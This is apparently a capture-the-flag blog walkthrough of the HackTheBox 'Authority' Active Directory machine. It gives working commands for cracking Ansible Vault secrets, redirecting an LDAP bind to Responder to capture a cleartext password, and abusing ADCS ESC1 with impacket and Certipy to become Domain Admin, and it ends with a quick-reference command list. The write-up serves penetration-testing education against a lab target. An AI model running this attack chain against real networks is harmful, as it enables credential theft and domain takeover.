Back to blog
← Back to posts

HTB: Authority

July 15, 2023 HackTheBox Windows Medium Active Directory Ansible Vault ADCS ESC1 Certipy 15 min read
HTB Authority machine card
Authority is a medium Windows Active Directory machine. It starts with SMB anonymous access to a Development share containing Ansible playbooks with Ansible Vault-encrypted credentials. Cracking the vault key with ansible2john + John the Ripper reveals credentials to log into PWM (a password self-service app on port 8443). Modifying the PWM LDAP config to redirect to our machine and running Responder captures svc_ldap's plaintext password. Privilege escalation abuses ADCS ESC1 — we add a domain computer, request an Administrator certificate via Certipy, authenticate to get an LDAP shell, and add our user to Domain Admins.
SMB anon → Development Ansible Vault → john PWM login Responder → svc_ldap addcomputer ADCS ESC1 → Certipy Domain Admin

Reconnaissance

Nmap

Full port scan reveals a classic Windows Domain Controller fingerprint — DNS, Kerberos, LDAP, SMB, RPC, and an unusual port 8443 running a web app that redirects to /pwm.

nmap — full scan
SP1R4@kali)-[~/HTB/authority] └$ nmap -sC -sV -p- 10.10.11.222 --min-rate=500 PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds? 636/tcp open ldapssl? 3268/tcp open ldap 8443/tcp open ssl/https-alt [redirects to /pwm] Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
hosts
echo "10.10.11.222 authority.htb authority.authority.htb" | sudo tee -a /etc/hosts

SMB Enumeration

SMB allows anonymous login. Listing shares reveals a non-standard Development share alongside the usual AD shares.

smbclient — list shares
SP1R4@kali)-[~/HTB/authority] └$ smbclient -L //10.10.11.222/
smbclient SMB shares listing
smbclient — download Development share
SP1R4@kali)-[~/HTB/authority] └$ smbclient -N //10.10.11.222/Development smb: \> recurse on smb: \> prompt off smb: \> mget *

The share contains Ansible playbooks under Automation/Ansible/PWM/defaults/. The main.yml files hold credentials encrypted with Ansible Vault.

Ansible PWM defaults directory

Cracking Ansible Vault

The vault-encrypted values start with $ANSIBLE_VAULT;1.1;AES256. We use ansible2john to convert them to a John-compatible hash, then crack with rockyou.

ansible2john — convert to hash
SP1R4@kali)-[~/HTB/authority] └$ ansible2john pwm_admin_login.txt > vaultpass.hash
ansible2john hash conversion
john — crack vault password
SP1R4@kali)-[~/HTB/authority] └$ john vaultpass.hash --wordlist=/usr/share/wordlists/rockyou.txt └$ john vaultpass.hash --show
John cracking vault password

Vault key cracked: !@#$%^&*. Now decrypt the credentials:

ansible-vault decrypt
SP1R4@kali)-[~/HTB/authority] └$ cat pwm_admin_login.txt | ansible-vault decrypt Vault password: !@#$%^&* Decryption successful └$ cat pwm_admin_password.txt | ansible-vault decrypt Vault password: !@#$%^&* Decryption successful
ansible-vault decrypt success

PWM — Password Self Service (port 8443)

Port 8443 hosts PWM, an open-source LDAP password self-service application. The decrypted credentials grant access as Configuration Manager. PWM shows LDAP connection errors — it is trying to reach ldaps://authority.authority.htb:636 but failing, and we notice user svc_ldap in the bind DN.

PWM login page PWM health page with LDAP error

LDAP Capture via Responder

The Configuration Manager page allows us to Download and Import the PWM XML config. We modify the LDAP server URL to point to our machine, import the config, then start Responder. When PWM retries the LDAP bind it sends the credentials in plaintext to us.

config modification — PwmConfiguration.xml
# Change the LDAP URL in PwmConfiguration.xml <value>ldaps://authority.authority.htb:636</value> # to: <value>ldap://<YOUR_IP>:389</value> # Import modified config via Configuration Manager, then...
responder — capture LDAP bind
SP1R4@kali)-[~/HTB/authority] └$ responder -I tun0 -wA [LDAP] Cleartext Client : 10.10.11.222 [LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,DC=authority,DC=htb [LDAP] Cleartext Password : lDaP_1n_th3_cle4r!
🚩 Plaintext credentials captured: svc_ldap : lDaP_1n_th3_cle4r!

Foothold

evil-winrm
SP1R4@kali)-[~/HTB/authority] └$ evil-winrm -i 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' *Evil-WinRM* PS C:\Users\svc_ldap\Desktop> type user.txt HTB{...}
🚩 User flag captured.

Privilege Escalation — ADCS ESC1

Add a Domain Computer

The domain allows any authenticated user to add computer accounts (ms-DS-MachineAccountQuota is non-zero). We add a fake computer to get a machine account we control.

impacket-addcomputer
SP1R4@kali)-[~/HTB/authority] └$ impacket-addcomputer authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!' \ -dc-ip 10.10.11.222 -computer-name 'SP1R4$' -computer-pass 'SP1R4pass1!' [*] Successfully added machine account SP1R4$ with password SP1R4pass1!.

Find ESC1 via Certipy

Certipy enumerates ADCS certificate templates. It finds a template vulnerable to ESC1 — any Domain Computer can enroll and specify an arbitrary Subject Alternative Name, allowing us to impersonate any user including Administrator.

certipy find — enumerate templates
SP1R4@kali)-[~/HTB/authority] └$ certipy find -u 'SP1R4$@authority.htb' -p 'SP1R4pass1!' -dc-ip 10.10.11.222 -vulnerable [!] Vulnerabilities ESC1 - Template allows SAN; enrollment rights for Domain Computers
ESC1 — the template permits enrollees to specify an arbitrary Subject Alternative Name (UPN). By setting UPN to administrator@authority.htb, we obtain a certificate that authenticates as Administrator.

Request Administrator Certificate

certipy req
SP1R4@kali)-[~/HTB/authority] └$ certipy req -username 'SP1R4$@authority.htb' -password 'SP1R4pass1!' \ -ca 'AUTHORITY-CA' -template 'CorpVPN' \ -upn 'administrator@authority.htb' -dc-ip 10.10.11.222 [*] Saved certificate and private key to 'administrator_authority.pfx'

Authenticate with Certificate — LDAP Shell

certipy auth — ldap-shell
SP1R4@kali)-[~/HTB/authority] └$ certipy auth -pfx administrator_authority.pfx -dc-ip 10.10.11.222 -ldap-shell # Got ldap-shell as Administrator ldap-shell> add_user sp1r4admin ldap-shell> change_password sp1r4admin 'Passw0rd123!' ldap-shell> add_user_to_group sp1r4admin 'Domain Admins' Successfully added sp1r4admin to Domain Admins.

Root Flag

crackmapexec — domain admin
SP1R4@kali)-[~/HTB/authority] └$ crackmapexec winrm 10.10.11.222 -u 'sp1r4admin' -p 'Passw0rd123!' -x 'type C:\Users\Administrator\Desktop\root.txt' WINRM 10.10.11.222 [+] authority.htb\sp1r4admin:Passw0rd123! (Pwn3d!) HTB{...}
🚩 Root flag captured. Machine pwned.

Summary

StageTechniqueTool
ReconFull port scan → DC ports + port 8443 (PWM)nmap
EnumSMB anonymous → Development share → Ansible playbookssmbclient
Cred decryptansible2john → john crack → ansible-vault decryptjohn, ansible
FootholdPWM config LDAP redirect → Responder → svc_ldap plaintextresponder, evil-winrm
PrivEscaddcomputer → ADCS ESC1 → certipy req/auth → Domain Adminimpacket, certipy

Key commands

quick reference
# SMB enumeration smbclient -N //10.10.11.222/Development # Crack Ansible Vault ansible2john vault_file.txt > vault.hash && john vault.hash --wordlist=rockyou.txt cat vault_file.txt | ansible-vault decrypt # Capture LDAP credentials responder -I tun0 -wA # WinRM shell evil-winrm -i 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' # Add machine account impacket-addcomputer authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!' -dc-ip 10.10.11.222 -computer-name 'SP1R4$' -computer-pass 'SP1R4pass1!' # ADCS ESC1 exploit certipy find -u 'SP1R4$@authority.htb' -p 'SP1R4pass1!' -dc-ip 10.10.11.222 -vulnerable certipy req -username 'SP1R4$@authority.htb' -password 'SP1R4pass1!' -ca 'AUTHORITY-CA' -template 'CorpVPN' -upn 'administrator@authority.htb' -dc-ip 10.10.11.222 certipy auth -pfx administrator_authority.pfx -dc-ip 10.10.11.222 -ldap-shell